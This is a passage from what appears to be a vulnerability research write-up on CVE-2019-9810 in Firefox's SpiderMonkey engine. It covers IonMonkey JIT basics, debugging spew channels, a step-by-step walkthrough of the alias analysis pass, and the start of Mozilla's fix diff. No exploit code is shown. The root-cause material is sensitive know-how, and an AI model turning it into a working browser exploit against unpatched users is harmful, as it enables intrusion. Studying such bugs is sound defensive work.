This part is not really meant to introduce what optimizing speculative JIT engines are in detail but instead giving you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to be able to follow what is to come.

For the people that never heard about JIT (just-in-time) engines, this is a piece of software that is able to turn code that is managed code into native code as it runs. This has been historically used by interpreted languages to produce faster code as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey:

js> function f(a, b) { return a+b; }
js> dis(f)
flags: CONSTRUCTOR
loc     op
-----   --
main:
00000:  getarg 0                        #
00003:  getarg 1                        #
00006:  add                             #
00007:  return                          #
00008:  retrval                         # !!! UNREACHABLE !!!

Source notes:
 ofs line    pc  delta desc     args
---- ---- ----- ------ -------- ------
  0:    1     0 [   0] colspan 19
  2:    1     0 [   0] step-sep
  3:    1     0 [   0] breakpoint
  4:    1     7 [   7] colspan 12
  6:    1     8 [   1] breakpoint

Now, generating assembly is one thing but the JIT engine can be more advanced and apply a bunch of program analysis to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else. Well, the JIT engine might be able to prove that it is safe to not do any bounds check on the index in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body but doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, then why constructing it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function than above:

0:000> u . l20
000003ad`d5d09231 cc              int     3
000003ad`d5d09232 8b442428        mov     eax,dword ptr [rsp+28h]
000003ad`d5d09236 8b4c2430        mov     ecx,dword ptr [rsp+30h]
000003ad`d5d0923a 03c1            add     eax,ecx
000003ad`d5d0923c 0f802f000000    jo      000003ad`d5d09271
000003ad`d5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h
000003ad`d5d0924c 480bc8          or      rcx,rax
000003ad`d5d0924f c3              ret

000003ad`d5d09271 2bc1            sub     eax,ecx
000003ad`d5d09273 e900000000      jmp     000003ad`d5d09278
000003ad`d5d09278 6a0d            push    0Dh
000003ad`d5d0927a e900000000      jmp     000003ad`d5d0927f
000003ad`d5d0927f 6a00            push    0
000003ad`d5d09281 e99a6effff      jmp     000003ad`d5d00120 <- bailout

OK so this was for optimizing and JIT compiler, but what about speculative now? If you think about this for a minute or two though, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the object you are dealing with, and this information is hard to get in dynamically typed languages because by-design the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculates about types, instead what they usually do is introspect the program at runtime and observe what is going on. If this function has been invoked many times and everytime it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall-back to executing (called a deoptimization bailout) the code back in the interpreter, resulting in a performance hit.

As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).

  // Force how many invocation or loop iterations are needed before compiling
  // a function with the highest ionmonkey optimization level.
  // (i.e. OptimizationLevel_Normal)
  const char* forcedDefaultIonWarmUpThresholdEnv =
      "JIT_OPTION_forcedDefaultIonWarmUpThreshold";
  if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) {
    Maybe<int> value = ParseInt(env);
    if (value.isSome()) {
      forcedDefaultIonWarmUpThreshold.emplace(value.ref());
    } else {
      Warn(forcedDefaultIonWarmUpThresholdEnv, env);
    }
  }

  // From the Javascript shell source-code
  int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold");
  if (warmUpThreshold >= 0) {
    jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold);
  }

On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses Ion which is the fastest/most expensive tier of JIT in Spidermonkey.

Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki):

OK so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later) code. This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic-blocks and themselves form a control-flow graph.

Ion's optimization pipeline is composed of 29 steps: certain steps actually modifies the MIR graph by removing or shuffling nodes and others don't modify it at all (they just analyze it and produce results consumed by later passes). To debug Ion, I recommend to add the below to your mozconfig file:

ac_add_options --enable-jitspew

This basically turns on a bunch of macro in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer but we will do with the tools we have. The JIT subsystem can define a number of channels where it can output spew and the user can turn on/off any of them. This is pretty useful if you want to debug a single optimization pass for example.

// New channels may be added below.
#define JITSPEW_CHANNEL_LIST(_)            \
  /* Information during sinking */         \
  _(Prune)                                 \
  /* Information during escape analysis */ \
  _(Escape)                                \
  /* Information during alias analysis */  \
  _(Alias)                                 \
  /* Information during alias analysis */  \
  _(AliasSummaries)                        \
  /* Information during GVN */             \
  _(GVN)                                   \
  /* Information during sincos */          \
  _(Sincos)                                \
  /* Information during sinking */         \
  _(Sink)                                  \
  /* Information during Range analysis */  \
  _(Range)                                 \
  /* Information during LICM */            \
  _(LICM)                                  \
  /* Info about fold linear constants */   \
  _(FLAC)                                  \
  /* Effective address analysis info */    \
  _(EAA)                                   \
  /* Information during regalloc */        \
  _(RegAlloc)                              \
  /* Information during inlining */        \
  _(Inlining)                              \
  /* Information during codegen */         \
  _(Codegen)                               \
  /* Debug info about safepoints */        \
  _(Safepoints)                            \
  /* Debug info about Pools*/              \
  _(Pools)                                 \
  /* Profiling-related information */      \
  _(Profiling)                             \
  /* Information of tracked opt strats */  \
  _(OptimizationTracking)                  \
  _(OptimizationTrackingExtended)          \
  /* Debug info about the I$ */            \
  _(CacheFlush)                            \
  /* Output a list of MIR expressions */   \
  _(MIRExpressions)                        \
  /* Print control flow graph */           \
  _(CFG)                                   \
                                           \
  /* BASELINE COMPILER SPEW */             \
                                           \
  /* Aborting Script Compilation. */       \
  _(BaselineAbort)                         \
  /* Script Compilation. */                \
  _(BaselineScripts)                       \
  /* Detailed op-specific spew. */         \
  _(BaselineOp)                            \
  /* Inline caches. */                     \
  _(BaselineIC)                            \
  /* Inline cache fallbacks. */            \
  _(BaselineICFallback)                    \
  /* OSR from Baseline => Ion. */          \
  _(BaselineOSR)                           \
  /* Bailouts. */                          \
  _(BaselineBailouts)                      \
  /* Debug Mode On Stack Recompile . */    \
  _(BaselineDebugModeOSR)                  \
                                           \
  /* ION COMPILER SPEW */                  \
                                           \
  /* Used to abort SSA construction */     \
  _(IonAbort)                              \
  /* Information about compiled scripts */ \
  _(IonScripts)                            \
  /* Info about failing to log script */   \
  _(IonSyncLogs)                           \
  /* Information during MIR building */    \
  _(IonMIR)                                \
  /* Information during bailouts */        \
  _(IonBailouts)                           \
  /* Information during OSI */             \
  _(IonInvalidate)                         \
  /* Debug info about snapshots */         \
  _(IonSnapshots)                          \
  /* Generated inline cache stubs */       \
  _(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
  JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
      JitSpew_Terminator
};

In order to turn those channels you need to define an environment variable called IONFLAGS where you can specify a comma separated string with all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don’t quite match with the macros above and so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
  fflush(nullptr);
  printf(
      "\n"
      "usage: IONFLAGS=option,option,option,... where options can be:\n"
      "\n"
      "  aborts        Compilation abort messages\n"
      "  scripts       Compiled scripts\n"
      "  mir           MIR information\n"
      "  prune         Prune unused branches\n"
      "  escape        Escape analysis\n"
      "  alias         Alias analysis\n"
      "  alias-sum     Alias analysis: shows summaries for every block\n"
      "  gvn           Global Value Numbering\n"
      "  licm          Loop invariant code motion\n"
      "  flac          Fold linear arithmetic constants\n"
      "  eaa           Effective address analysis\n"
      "  sincos        Replace sin/cos by sincos\n"
      "  sink          Sink transformation\n"
      "  regalloc      Register allocation\n"
      "  inline        Inlining\n"
      "  snapshots     Snapshot information\n"
      "  codegen       Native code generation\n"
      "  bailouts      Bailouts\n"
      "  caches        Inline caches\n"
      "  osi           Invalidation\n"
      "  safepoints    Safepoints\n"
      "  pools         Literal Pools (ARM only for now)\n"
      "  cacheflush    Instruction Cache flushes (ARM only for now)\n"
      "  range         Range Analysis\n"
      "  logs          JSON visualization logging\n"
      "  logs-sync     Same as logs, but flushes between each pass (sync. "
      "compiled functions only).\n"
      "  profiling     Profiling-related information\n"
      "  trackopts     Optimization tracking information gathered by the "
      "Gecko profiler. "
      "(Note: call enableGeckoProfiling() in your script to enable it).\n"
      "  trackopts-ext Encoding information about optimization tracking\n"
      "  dump-mir-expr Dump the MIR expressions\n"
      "  cfg           Control flow graph generation\n"
      "  all           Everything\n"
      "\n"
      "  bl-aborts     Baseline compiler abort messages\n"
      "  bl-scripts    Baseline script-compilation\n"
      "  bl-op         Baseline compiler detailed op-specific messages\n"
      "  bl-ic         Baseline inline-cache messages\n"
      "  bl-ic-fb      Baseline IC fallback stub messages\n"
      "  bl-osr        Baseline IC OSR messages\n"
      "  bl-bails      Baseline bailouts\n"
      "  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
      "  bl-all        All baseline spew\n"
      "\n"
      "See also SPEW=help for information on the Structured Spewer."
      "\n");
  exit(status);
}

An important channel is logs which tells the compiler to output a ion.json file (in /tmp on Linux) which packs a ton of information that it gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the pass directly from the browser which I find more convenient than navigating through a bunch of PNG files:

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite

Reading MIR code is not too bad, you just have to know a few things:

Every instruction is an object
Each instruction can have operands that can be the result of a previous instruction

10 | add unbox8:Int32 unbox9:Int32 [int32]

Every instruction is identified by an identifier, which is an integer starting from 0
There are no variable names; if you want to reference the result of a previous instruction it creates a name by taking the name of the instruction concatenated with its identifier like unbox8 and unbox9 above. Those two references two unbox instructions identified by their identifiers 8 and 9:

08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)

That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

V8 powering Google Chrome:
JavaScript Core powering Safari:
- Introducing the WebKit FTL JIT by @filpizlo,
- Inline Caching in JavaScriptCore by @filpizlo,
Chakra powering Microsoft Edge: Architecture overview

Let's have a look at alias analysis now :)

Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger as well as following the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
    const a = [1,2,3,4];
    a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
    x();
}

Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

The alias analysis is able to output a summary on the alias-sum channel and this is what it prints out when ran against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29

OK, so that's kind of a lot for now so let's start at the beginning. Ion uses what they call alias set. You can see an alias set as an equivalence sets (term also used in compiler literature). Everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that’s all it cares about. Alias information is used later in the pipeline to carry optimization such as redundancy elimination for example - more on that later.

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.

In Ion, instructions are free to provide refinement to their alias set by overloading getAliasSet; here are the various alias sets defined for every different MIR opcode that we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
  AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
  // NewArray is marked as non-effectful because all our allocations are
  // either lazy when we are using "new Array(length)" or bounded by the
  // script or the stack size when we are using "new Array(...)" or "[...]"
  // notations.  So we might have to allocate the array twice if we bail
  // during the computation of the first element of the square braket
  // notation.
  virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store a value to a dense array slots vector.
class MStoreElement
    : public MTernaryInstruction,
      public MStoreElementCommon,
      public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

// Load the array length from an elements header.
class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
                                     UnboxedInt32Policy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
  }
};

The analyze function ignores instruction that are associated with no alias set as you can see below..:

    for (MInstructionIterator def(block->begin()),
         end(block->begin(block->lastIns()));
         def != end; ++def) {
      def->setId(newId++);
      AliasSet set = def->getAliasSet();
      if (set.isNone()) {
        continue;
      }

..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]

This reads as instructions 13, 18, 23, 28 and 35 are store instruction in the AliasSet::Element alias set. Note that the instruction 35 not only alias AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction with the current store candidate (note that there is no need to walk the stores[AliasSet::Element vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, obviously the two instructions don't only need to have alias set that intersects (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operands of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect to do what its name suggests. The MayAlias analysis does two things:

Check if two instructions have intersecting alias sets
1. AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element)
Check if these instructions operate on intersecting TypeSets
1. GetObject is used to grab the appropriate operands off the instruction,
2. Then get its TypeSet,
3. And compute the intersection with objectsIntersect.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    case MDefinition::Opcode::InitializedLength:
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
    const MDefinition* load, const MDefinition* store) {
  const MDefinition* loadObject = GetObject(load);
  const MDefinition* storeObject = GetObject(store);
  if (!loadObject || !storeObject) {
    return MDefinition::AliasType::MayAlias;
  }

  if (!loadObject->resultTypeSet() || !storeObject->resultTypeSet()) {
    return MDefinition::AliasType::MayAlias;
  }

  if (loadObject->resultTypeSet()->objectsIntersect(
          storeObject->resultTypeSet())) {
    return MDefinition::AliasType::MayAlias;
  }

  return MDefinition::AliasType::NoAlias;
}

Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (has an Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]

The next step of the algorithm now is to figure out if the current load is depending on a prior store. If it does, a dependency link is created between the two; if it doesn't it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersects with the alias set of the load instruction (there is no point to carry on if we already know off the bat that they don't even intersect).

In our case, the 17 | elements newarray9:Object can only alias with a store coming from store[AliasSet::ObjectFields] and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything related to each other. Keep in mind that those nodes are instructions with operands and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
  while (object->isSlots() || object->isElements() ||
         object->isConvertElementsToDoubles()) {
    MOZ_ASSERT(object->numOperands() == 1);
    object = object->getOperand(0);
  }
  if (object->isTypedArrayElements()) {
    return nullptr;
  }
  if (object->isTypedObjectElements()) {
    return nullptr;
  }
  if (object->isConstantElements()) {
    return nullptr;
  }
  return object;
}

In our case newarray9:Object doesn't need any unwrapping as this is neither an MSlots / MElements / MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first argument elements12 which isn't the actual 'root' object. This is when MaybeUnwrap is useful and grabs for us the first operand of 12 | elements newarray9:Object, newarray9 which is the root object. Cool.

Anyways, once we have our two objects, loadObject and storeObject we need to figure out if they are related. To do that, Ion uses a structure called a js::TemporaryTypeSet. My understanding is that a TypeSet completely describe the values that a particular value might have.

/*
 * [SMDOC] Type-Inference TypeSet
 *
 * Information about the set of types associated with an lvalue. There are
 * three kinds of type sets:
 *
 * - StackTypeSet are associated with TypeScripts, for arguments and values
 *   observed at property reads. These are implicitly frozen on compilation
 *   and only have constraints added to them which can trigger invalidation of
 *   TypeNewScript information.
 *
 * - HeapTypeSet are associated with the properties of ObjectGroups. These
 *   may have constraints added to them to trigger invalidation of either
 *   compiled code or TypeNewScript information.
 *
 * - TemporaryTypeSet are created during compilation and do not outlive
 *   that compilation.
 *
 * The contents of a type set completely describe the values that a particular
 * lvalue might have, except for the following cases:
 *
 * - If an object's prototype or class is dynamically mutated, its group will
 *   change. Type sets containing the old group will not necessarily contain
 *   the new group. When this occurs, the properties of the old and new group
 *   will both be marked as unknown, which will prevent Ion from optimizing
 *   based on the object's type information.
 *
 * - If an unboxed object is converted to a native object, its group will also
 *   change and type sets containing the old group will not necessarily contain
 *   the new group. Unlike the above case, this will not degrade property type
 *   information, but Ion will no longer optimize unboxed objects with the old
 *   group.
 */

As a reminder, in our case we have newarray9:Object as loadObject (extracted off 17 | elements newarray9:Object) and newarray9:Object (extracted off 14 | setinitializedlength elements12:Elements constant11:Int32 which is the store candidate). Their TypeSet intersects (they have the same one) and as a result this means genericMightAlias returns Alias::MayAlias.

If genericMightAlias returns MayAlias the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable which is the load instruction. This method is a virtual method that can be overridden by instructions in which case they get a chance to specify a specific behavior there.

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
    // Return whether this load may depend on the specified store, given
    // that the alias sets intersect. This may be refined to exclude
    // possible aliasing in cases where alias set flags are too imprecise.
    if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
      return AliasType::NoAlias;
    }
    MOZ_ASSERT(!isEffectful() && store->isEffectful());
    return AliasType::MayAlias;
  }

As a reminder, in our case, the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields)) as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

We are nearly done but... the algorithm doesn't quite end just yet though. It keeps iterating through the store candidates as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not a store as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
    MInstructionVector& aliasedStores = stores[*iter];
    for (int i = aliasedStores.length() - 1; i >= 0; i--) {
        MInstruction* store = aliasedStores[i];
        if (genericMightAlias(*def, store) !=
            MDefinition::AliasType::NoAlias &&
            def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
            BlockMightReach(store->block(), *block)) {
            if (lastStore->id() < store->id()) {
                lastStore = store;
            }
            break;
        }
    }
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");

In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14

Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

It iterates over the instructions in the basic block and only cares about store and load instructions If the instruction is a store, it gets added to a vector to keep track of it If the instruction is a load, it evaluates it against every store in the vector If the load and the store MayAlias a dependency link is created between them mightAlias checks the intersection of both AliasSet genericMayAlias checks the intersection of both TypeSet If the engine can prove that there is NoAlias possible then this algorithm carries on

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction which will ensure creation of dependencies between arrayslice and loads instruction (which also means less opportunity for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::MaybeCopyElementsForWrite:
     case MDefinition::Opcode::MaybeToDoubleElement:
     case MDefinition::Opcode::TypedArrayLength:
     case MDefinition::Opcode::TypedArrayByteOffset:
     case MDefinition::Opcode::SetTypedObjectOffset:
     case MDefinition::Opcode::SetDisjointTypedElements:
     case MDefinition::Opcode::ArrayPopShift:
     case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
     case MDefinition::Opcode::LoadTypedArrayElementHole:
     case MDefinition::Opcode::StoreTypedArrayElementHole:
     case MDefinition::Opcode::LoadFixedSlot:
     case MDefinition::Opcode::LoadFixedSlotAndUnbox:
     case MDefinition::Opcode::StoreFixedSlot:
     case MDefinition::Opcode::GetPropertyPolymorphic:
     case MDefinition::Opcode::SetPropertyPolymorphic:
     case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::LoadElementHole:
     case MDefinition::Opcode::TypedArrayElements:
     case MDefinition::Opcode::TypedObjectElements:
     case MDefinition::Opcode::CopyLexicalEnvironmentObject:
     case MDefinition::Opcode::IsPackedArray:
       object = ins->getOperand(0);
       break;
     case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
     case MDefinition::Opcode::GetDOMProperty:
     case MDefinition::Opcode::GetDOMMember:
     case MDefinition::Opcode::Call:
     case MDefinition::Opcode::Compare:
     case MDefinition::Opcode::GetArgumentsObjectArg:
     case MDefinition::Opcode::SetArgumentsObjectArg:
     case MDefinition::Opcode::GetFrameArgument:
     case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::WasmAtomicExchangeHeap:
     case MDefinition::Opcode::WasmLoadGlobalVar:
     case MDefinition::Opcode::WasmLoadGlobalCell:
     case MDefinition::Opcode::WasmStoreGlobalVar:
     case MDefinition::Opcode::WasmStoreGlobalCell:
     case MDefinition::Opcode::WasmLoadRef:
